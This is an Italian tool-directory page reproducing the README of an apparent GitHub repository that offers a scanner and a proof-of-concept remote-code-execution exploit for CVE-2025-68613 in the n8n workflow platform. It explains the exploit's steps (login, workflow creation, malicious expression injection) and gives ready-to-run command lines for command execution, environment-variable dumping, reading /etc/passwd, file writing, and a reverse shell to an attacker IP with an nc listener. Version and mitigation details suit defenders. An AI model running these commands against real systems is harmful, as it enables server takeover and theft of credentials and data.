Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubgagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

n8n CVE-2025-68613

Vedi RepositorySito web
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68613 – n8n Iniezione di espressioni RCE

Python Security CVE Status

Questo toolkit fornisce scanner ed exploit PoC per la vulnerabilità critica CVE-2025-68613 in n8n Workflow Automation Platform.

Questo repository fornisce script scanner ed exploit PoC per la vulnerabilità critica CVE-2025-68613 che colpisce n8n Workflow Automation Platform.


AVVERTENZA

Indonesiano

Questo strumento è SOLO per test di sicurezza LEGITTIMI e AUTORIZZATI. È vietato utilizzare questo strumento su sistemi senza il permesso del proprietario.

Inglese

Questo strumento è SOLO per test di sicurezza autorizzati e legali. L'uso non autorizzato è illegale e vietato.


Panoramica della vulnerabilità

  • CVE ID : CVE-2025-68613
  • Gravità : Critica
  • CVSS : 10.0
  • Tipo : Iniezione di espressioni → Esecuzione remota di codice (RCE)
  • Prodotto : n8n Workflow Automation Platform

Versioni vulnerabili

  • 0.211.0 – 1.120.3
  • 1.121.0

Versioni patchate

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

Struttura del repository

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py   # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md

Scanner (senza exploit)

Lo scanner viene utilizzato per:

  • Rilevare il servizio n8n
  • Estrarre la versione di n8n
  • Determinare lo stato della vulnerabilità
  • Non eseguire exploit
  • Supportare l'output JSON

Lo scanner:

  • Rileva il servizio n8n
  • Estrae la versione di n8n
  • Determina lo stato della vulnerabilità
  • Non esegue exploit
  • Supporta l'output JSON

Lo scanner controlla i seguenti endpoint:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

Dipendenze / Requisiti

Indonesiano

Pacchetti richiesti:

  • requests

Contenuto del file requirements.txt:

root@kitploit:~
requests>=2.28.0

Inglese

Pacchetti richiesti:

  • requests

Contenuto di requirements.txt:

root@kitploit:~
requests>=2.28.0

Installazione

root@kitploit:~
pip install -r requirements.txt

Utilizzo dello scanner

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

Modalità JSON dello scanner

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

Esempio di output JSON dello scanner

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

Codici di uscita dello scanner

CodiceSignificato
0Non vulnerabile
1Versione sconosciuta
2Vulnerabile

Exploit PoC (RCE autenticata)

Questo exploit RICHIEDE credenziali n8n valide
L'accesso autenticato è OBBLIGATORIO

L'exploit funziona così:

  1. Effettua il login a n8n
  2. Crea un workflow
  3. Inserisce un'espressione dannosa nel nodo Set
  4. Esegue il workflow
  5. (Opzionale) Pulizia del workflow

Argomenti dell'exploit

ArgomentoObbligatorioDescrizione
-u / --url✅URL target n8n
-e / --email✅Email dell'account n8n
-p / --password✅Password dell'account n8n
--payload✅Tipo di payload
--command❌Comando del sistema operativo (cmd)
--file❌Percorso del file (read/write)
--content❌Contenuto del file (write)
--lhost❌IP dell'attaccante (revshell)
--lport❌Porta dell'attaccante (revshell)
--verify-ssl❌Verifica il certificato SSL

Payload supportati

PayloadFunzione
infoInformazioni di sistema
cmdEsecuzione di comandi
envDump delle variabili d'ambiente
readLettura file
writeScrittura file
revshellReverse shell

Screenshot

Esempi di exploit

Informazioni di sistema

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

Esecuzione di comandi

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

Lettura di un file

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

Scrittura di un file

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

Reverse shell

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

Mitigazione

  • Aggiorna n8n alle versioni patchate
  • Limita l'accesso agli endpoint /rest/*
  • Applica RBAC e autenticazione forte
  • Controlla i workflow sconosciuti

Disclaimer

Questo progetto è fornito solo per test di sicurezza autorizzati e a scopo educativo.
L'autore non è responsabile per un uso improprio.


Argomenti GitHub

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

Resta legale. Resta etico.

Scarica lo strumento